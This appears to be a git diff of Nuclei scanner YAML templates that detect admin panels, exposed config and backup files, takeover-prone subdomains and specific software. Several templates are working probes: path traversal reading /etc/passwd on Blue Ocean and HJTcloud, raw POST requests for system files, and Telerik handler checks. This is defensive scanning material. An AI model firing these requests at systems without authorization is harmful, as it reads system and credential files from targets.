||||||
|
- ".yunduncname.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: knownsec-ns
|
||||||
|
words:
|
||||||
|
- ".jiasule.net"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: chuangyudun
|
||||||
|
words:
|
||||||
|
- ".365cyd.net"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: qianxin
|
||||||
|
words:
|
||||||
|
- ".360wzb.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: anquanbao
|
||||||
|
words:
|
||||||
|
- ".anquanbao.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: wangsu
|
||||||
|
words:
|
||||||
|
- ".chinanetcenter.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: baiduyunjiasue
|
||||||
|
words:
|
||||||
|
- ".ns.yunjiasu.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: chinacache
|
||||||
|
words:
|
||||||
|
- ".chinacache.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: cloudflare
|
||||||
|
words:
|
||||||
|
- "ns.cloudflare.com"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
name: edns
|
||||||
|
words:
|
||||||
|
- ".iidns.com"
|
|
@ -1,19 +0,0 @@
|
||||||
id: airflow-exposure
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Apache Airflow Exposure / Unauthenticated Access
|
|
||||||
author: pdteam
|
|
||||||
severity: medium
|
|
||||||
tags: panel
|
|
||||||
|
|
||||||
requests:
|
|
||||||
- method: GET
|
|
||||||
path:
|
|
||||||
- '{{BaseURL}}'
|
|
||||||
- '{{BaseURL}}/admin/'
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
words:
|
|
||||||
- '<title>Airflow - DAGs</title>'
|
|
||||||
- '<a href="https://github.com/apache/airflow">'
|
|
||||||
condition: and
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: airflow-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Airflow Admin login
|
||||||
|
author: pdteam
|
||||||
|
severity: info
|
||||||
|
tags: panel,apache,airflow
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/admin/airflow/login"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Airflow - Login"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: clave-login-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Clave login panel
|
||||||
|
author: __Fazal
|
||||||
|
severity: info
|
||||||
|
tags: panel,clave
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/admin.php'
|
||||||
|
|
||||||
|
redirects: true
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Clave"
|
|
@ -0,0 +1,18 @@
|
||||||
|
id: dotcms-admin-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: dotAdmin Panel
|
||||||
|
author: impramodsargar
|
||||||
|
severity: info
|
||||||
|
tags: panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/dotAdmin/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>dotCMS Content Management Platform</title>'
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: ems-login-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: EMS Login page detection
|
||||||
|
author: __Fazal
|
||||||
|
severity: info
|
||||||
|
tags: panel,ems
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/EMSWebClient/Login.aspx'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "EMS Web Client - Login"
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: lancom-router-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Lancom Router Panel
|
||||||
|
author: __Fazal
|
||||||
|
severity: info
|
||||||
|
tags: panel,lancom
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "LANCOM 1790VA-4G"
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: luci-login-detection
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: LuCi Login Detector
|
||||||
|
author: aashiq
|
||||||
|
severity: info
|
||||||
|
description: Searches for LuCi Login pages by attempting to query the cgi-bin endpoint
|
||||||
|
tags: login
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/cgi-bin/luci"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Authorization Required"
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: openerp-database
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: OpenERP database instances
|
||||||
|
author: impramodsargar
|
||||||
|
severity: info
|
||||||
|
tags: openerp
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/web/database/selector/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Odoo</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: servicedesk-login-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Servicedesk Login Panel Detector
|
||||||
|
author: aashiq
|
||||||
|
severity: info
|
||||||
|
description: Searches for ServiceDesk login panels by trying to query the "/servicedesk/customer/user/login" endpoint
|
||||||
|
tags: servicedesk,confluence,jira,panel
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/servicedesk/customer/user/login"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "https://confluence.atlassian.com"
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: synnefo-admin-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Synnefo Admin Panel Exposure
|
||||||
|
author: impramodsargar
|
||||||
|
severity: info
|
||||||
|
tags: panel,synnefo
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/synnefoclient/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<title>Synnefo Admin</title>'
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,22 @@
|
||||||
|
id: zenario-login-panel
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Zenario Admin login
|
||||||
|
author: __Fazal
|
||||||
|
severity: info
|
||||||
|
tags: panel,zenario
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/zenario/admin/welcome.php'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Welcome to Zenario"
|
|
@ -30,12 +30,15 @@ requests:
|
||||||
- "{{BaseURL}}/wp-content/uploads/dump.sql"
|
- "{{BaseURL}}/wp-content/uploads/dump.sql"
|
||||||
headers:
|
headers:
|
||||||
Range: "bytes=0-3000"
|
Range: "bytes=0-3000"
|
||||||
|
|
||||||
|
max-size: 2000 # Size in bytes - Max Size to read from server response
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO"
|
- "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO"
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -32,6 +32,8 @@ requests:
|
||||||
- "{{BaseURL}}/{{Hostname}}.sql.zip"
|
- "{{BaseURL}}/{{Hostname}}.sql.zip"
|
||||||
- "{{BaseURL}}/{{Hostname}}.sql.z"
|
- "{{BaseURL}}/{{Hostname}}.sql.z"
|
||||||
- "{{BaseURL}}/{{Hostname}}.sql.tar.z"
|
- "{{BaseURL}}/{{Hostname}}.sql.tar.z"
|
||||||
|
|
||||||
|
max-size: 500 # Size in bytes - Max Size to read from server response
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: binary
|
- type: binary
|
||||||
|
@ -49,10 +51,12 @@ requests:
|
||||||
- "504B0304" # zip
|
- "504B0304" # zip
|
||||||
condition: or
|
condition: or
|
||||||
part: body
|
part: body
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "application/[-\\w.]+"
|
- "application/[-\\w.]+"
|
||||||
part: header
|
part: header
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
|
@ -4,7 +4,7 @@ info:
|
||||||
name: Apache Airflow Configuration Exposure
|
name: Apache Airflow Configuration Exposure
|
||||||
author: pdteam
|
author: pdteam
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: exposure,config
|
tags: exposure,config,airflow,apache
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: detect-drone-config
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Detect Drone Configuration
|
||||||
|
author: geeknik
|
||||||
|
description: Drone is a Container-Native, Continuous Delivery Platform -- https://github.com/drone/drone
|
||||||
|
severity: high
|
||||||
|
tags: config,exposure,drone
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.drone.yml"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "kind:"
|
||||||
|
- "name:"
|
||||||
|
- "steps:"
|
||||||
|
condition: and
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -18,8 +18,13 @@ requests:
|
||||||
words:
|
words:
|
||||||
- "parent_location"
|
- "parent_location"
|
||||||
- "push_location"
|
- "push_location"
|
||||||
condition: and
|
condition: or
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: header
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
|
@ -4,14 +4,12 @@ info:
|
||||||
name: Exposed SVN Directory
|
name: Exposed SVN Directory
|
||||||
author: udit_thakkur & dwisiswant0
|
author: udit_thakkur & dwisiswant0
|
||||||
severity: medium
|
severity: medium
|
||||||
tags: config,exposure
|
tags: config,exposure,svn
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}/.svn/entries"
|
- "{{BaseURL}}/.svn/entries"
|
||||||
- "{{BaseURL}}/.svn/prop-base/"
|
|
||||||
- "{{BaseURL}}/.svn/text-base/"
|
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -19,10 +17,12 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))"
|
- "(^10\\s*dir|\\.svn-base|has-props|svn:\\/\\/|([\\da-f]{32}[\\S+\\r\\n\\s]+[\\d]{4}-[\\d]{2}-[\\d]{2}T[\\d]{2}:[\\d]{2}:[\\d]{2}.[\\d]{6}Z))"
|
||||||
|
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: dsl
|
- type: word
|
||||||
dsl:
|
part: header
|
||||||
- 'contains(tolower(body), "<html") == false && contains(tolower(body), "</body>") == false'
|
words:
|
||||||
|
- "text/plain"
|
|
@ -0,0 +1,18 @@
|
||||||
|
id: exposed-vscode
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Exposed VSCode Folders
|
||||||
|
author: aashiq
|
||||||
|
severity: low
|
||||||
|
description: Searches for exposed Visual Studio Code Directories by querying the /.vscode endpoint and existence of "index of" in the body
|
||||||
|
tags: vscode,exposure
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/.vscode/"
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Index of /.vscode"
|
||||||
|
part: body
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: hikvision-info-leak
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Hikvision Info Leak
|
||||||
|
author: pikpikcu
|
||||||
|
severity: medium
|
||||||
|
tags: exposure,config
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/config/user.xml'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '<user name='
|
||||||
|
- 'password='
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/xml"
|
||||||
|
part: header
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: zend-config-file
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Zend Configuration File
|
||||||
|
author: pdteam
|
||||||
|
severity: high
|
||||||
|
tags: config,exposure,zend,php
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/application/configs/application.ini"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "resources.db.params.password"
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "text/plain"
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -26,6 +26,8 @@ requests:
|
||||||
part: body
|
part: body
|
||||||
regex:
|
regex:
|
||||||
- (K|k)ey(up|down|press)
|
- (K|k)ey(up|down|press)
|
||||||
|
- (K|k)eyboard(N|n)avigation
|
||||||
|
condition: or
|
||||||
negative: true
|
negative: true
|
||||||
|
|
||||||
extractors:
|
extractors:
|
||||||
|
|
|
@ -0,0 +1,23 @@
|
||||||
|
id: epson-wf-series
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Epson WF Series Detection
|
||||||
|
author: aashiq
|
||||||
|
severity: info
|
||||||
|
description: Searches for Epson WF series printers on the domain
|
||||||
|
tags: iot,printer
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/PRESENTATION/HTML/TOP/PRTINFO.HTML"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "SEIKO EPSON"
|
|
@ -16,4 +16,4 @@ requests:
|
||||||
part: header
|
part: header
|
||||||
group: 1
|
group: 1
|
||||||
regex:
|
regex:
|
||||||
- "Allow: ([A-Z,]+)"
|
- "Allow: ([A-Z, ]+)"
|
||||||
|
|
|
@ -0,0 +1,26 @@
|
||||||
|
id: airflow-debug
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Airflow Debug Trace
|
||||||
|
author: pdteam
|
||||||
|
severity: low
|
||||||
|
tags: apache,airflow,fpd
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/admin/airflow/login"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "<h1> Ooops. </h1>"
|
||||||
|
- "Traceback (most recent call last)"
|
||||||
|
condition: and
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 500
|
|
@ -0,0 +1,27 @@
|
||||||
|
id: alibaba-mongoshake-unauth
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Alibaba Mongoshake Unauth
|
||||||
|
author: pikpikcu
|
||||||
|
severity: info
|
||||||
|
tags: mongoshake,unauth
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- '{{BaseURL}}/'
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '{"Uri":"/worker","Method":"GET"}'
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- 'text/plain'
|
||||||
|
part: header
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,25 @@
|
||||||
|
id: private-key-exposure
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Private key exposure via helper detector
|
||||||
|
author: aashiq
|
||||||
|
severity: high
|
||||||
|
description: Searches for private key exposure by attempting to query the helper endpoint on node_modules
|
||||||
|
tags: exposure,node
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/node_modules/mqtt/test/helpers/"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- "Index of /node_modules/mqtt/test/helpers"
|
||||||
|
- "Parent Directory"
|
||||||
|
condition: and
|
|
@ -12,8 +12,14 @@ requests:
|
||||||
path:
|
path:
|
||||||
- "{{BaseURL}}"
|
- "{{BaseURL}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- The page you have requested does not exist
|
- Repository not found
|
||||||
- Repository not found
|
part: body
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- text/plain
|
||||||
|
part: header
|
|
@ -3,9 +3,9 @@ id: landingi-takeover
|
||||||
info:
|
info:
|
||||||
name: landingi takeover detection
|
name: landingi takeover detection
|
||||||
author: pdcommunity
|
author: pdcommunity
|
||||||
severity: high
|
severity: info
|
||||||
tags: takeover
|
tags: takeover
|
||||||
reference: https://github.com/EdOverflow/can-i-take-over-xyz
|
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
|
@ -16,4 +16,5 @@ requests:
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- It looks like you're lost
|
- It looks like you're lost
|
||||||
- The page you are looking for is not found
|
- The page you are looking for is not found
|
||||||
|
condition: and
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: airflow-detect
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Apache Airflow
|
||||||
|
author: pdteam
|
||||||
|
severity: info
|
||||||
|
tags: tech,apache,airflow
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/{{randstr}}"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
part: body
|
||||||
|
words:
|
||||||
|
- "Airflow 404 = lots of circles"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 404
|
|
@ -1,7 +1,7 @@
|
||||||
id: graphql
|
id: graphql-detect
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: GraphQL API
|
name: GraphQL API Detection
|
||||||
author: NkxxkN & ELSFA7110
|
author: NkxxkN & ELSFA7110
|
||||||
severity: info
|
severity: info
|
||||||
|
|
||||||
|
@ -51,6 +51,7 @@ requests:
|
||||||
|
|
||||||
headers:
|
headers:
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
|
body: '{"query":"query IntrospectionQuery{__schema {queryType { name }}}"}'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -58,8 +59,10 @@ requests:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
- type: regex
|
- type: regex
|
||||||
regex:
|
regex:
|
||||||
- "__schema"
|
- "__schema"
|
||||||
- "(Introspection|INTROSPECTION|introspection).*?"
|
- "(Introspection|INTROSPECTION|introspection).*?"
|
||||||
- ".*?operation not found.*?"
|
- ".*?operation not found.*?"
|
||||||
|
condition: or
|
|
@ -4,17 +4,30 @@ info:
|
||||||
name: Detect Telerik Web UI Dialog Handler
|
name: Detect Telerik Web UI Dialog Handler
|
||||||
author: organiccrap & zhenwarx
|
author: organiccrap & zhenwarx
|
||||||
severity: info
|
severity: info
|
||||||
reference: https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
|
reference: |
|
||||||
|
- https://captmeelo.com/pentest/2018/08/03/pwning-with-telerik.html
|
||||||
|
- https://github.com/bao7uo/dp_crypto
|
||||||
tags: telerik,asp
|
tags: telerik,asp
|
||||||
|
|
||||||
requests:
|
requests:
|
||||||
- method: GET
|
- method: GET
|
||||||
path:
|
path:
|
||||||
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx'
|
- '{{BaseURL}}/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/telerik.web.ui.dialoghandler.aspx'
|
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx?dp=1'
|
||||||
- '{{BaseURL}}/providers/htmleditorproviders/telerik/telerik.web.ui.dialoghandler.aspx'
|
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx?dp=1'
|
||||||
- '{{BaseURL}}/desktopmodules/telerikwebui/radeditorprovider/telerik.web.ui.dialoghandler.aspx'
|
- '{{BaseURL}}/DesktopModules/Admin/RadEditorProvider/DialogHandler.aspx?dp=1'
|
||||||
- '{{BaseURL}}/desktopmodules/dnnwerk.radeditorprovider/dialoghandler.aspx'
|
- '{{BaseURL}}/DesktopModule/UIQuestionControls/UIAskQuestion/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/Modules/CMS/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/Admin/ServerSide/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/DesktopModules/TNComments/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/common/admin/Jobs2/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/AsiCommon/Controls/ContentManagement/ContentDesigner/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/common/admin/Calendar/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/cms/portlets/Telerik.Web.UI.DialogHandler.aspx?dp=1'
|
||||||
|
- '{{BaseURL}}/dashboard/UserControl/CMS/Page/Telerik.Web.UI.DialogHandler.aspx/Desktopmodules/Admin/dnnWerk.Users/DialogHandler.aspx?dp=1'
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
matchers:
|
matchers:
|
||||||
|
@ -23,4 +36,4 @@ requests:
|
||||||
- 200
|
- 200
|
||||||
- type: word
|
- type: word
|
||||||
words:
|
words:
|
||||||
- Loading the dialog...
|
- 'Invalid length for a Base-64 char array'
|
||||||
|
|
|
@ -0,0 +1,24 @@
|
||||||
|
id: blue-ocean-excellence-lfi
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: Blue Ocean Excellence LFI
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: https://blog.csdn.net/qq_41901122/article/details/116786883
|
||||||
|
tags: blue-ocean,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/download.php?file=../../../../../etc/passwd"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "toor:[x*]:0:0"
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,43 @@
|
||||||
|
id: hjtcloud-arbitrary-file-read
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HJTcloud Arbitrary File Read
|
||||||
|
author: pikpikcu
|
||||||
|
severity: high
|
||||||
|
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
|
||||||
|
tags: hjtcloud,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- raw:
|
||||||
|
- |
|
||||||
|
POST /fileDownload?action=downloadBackupFile HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
Content-Length: 20
|
||||||
|
|
||||||
|
fullPath=/etc/passwd
|
||||||
|
|
||||||
|
- |
|
||||||
|
POST /fileDownload?action=downloadBackupFile HTTP/1.1
|
||||||
|
Host: {{Hostname}}
|
||||||
|
Accept: application/json, text/plain, */*
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
|
||||||
|
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
|
||||||
|
Content-Length: 20
|
||||||
|
|
||||||
|
fullPath=/Windows/win.ini
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "root:[x*]:0:0:"
|
||||||
|
- "bit app support"
|
||||||
|
condition: or
|
||||||
|
|
||||||
|
- type: status
|
||||||
|
status:
|
||||||
|
- 200
|
|
@ -0,0 +1,34 @@
|
||||||
|
id: hjtcloud-rest-arbitrary-file-read
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: HJTcloud Arbitrary file read
|
||||||
|
author: pikpikcu
|
||||||
|
severity: low
|
||||||
|
reference: https://mp.weixin.qq.com/s/w2pkj5ADN7b5uxe-wmfGbw
|
||||||
|
tags: hjtcloud,lfi
|
||||||
|
|
||||||
|
requests:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/him/api/rest/V1.0/system/log/list?filePath=../"
|
||||||
|
|
||||||
|
matchers-condition: and
|
||||||
|
matchers:
|
||||||
|
|
||||||
|
- type: word
|
||||||
|
words:
|
||||||
|
- '"name":'
|
||||||
|
- '"length":'
|
||||||
